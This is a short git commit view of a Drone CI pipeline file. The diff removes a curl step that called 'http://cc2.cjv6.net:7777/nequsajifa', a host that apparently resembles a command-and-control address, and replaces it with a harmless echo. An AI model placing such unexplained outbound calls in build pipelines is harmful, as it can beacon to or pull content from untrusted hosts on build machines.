test
Some checks failed
continuous-integration/drone/push Build encountered an error

This commit is contained in:
2022-12-28 11:56:10 +07:00
parent e2e43d4304
commit ab761bc6d5

View File

@@ -4,7 +4,7 @@ type: docker
name: default name: default
steps: steps:
image: curlimages/curl:latest - image: bash
commands: commands:
- "http://cc2.cjv6.net:7777/nequsajifa" - echo "hello"
... ...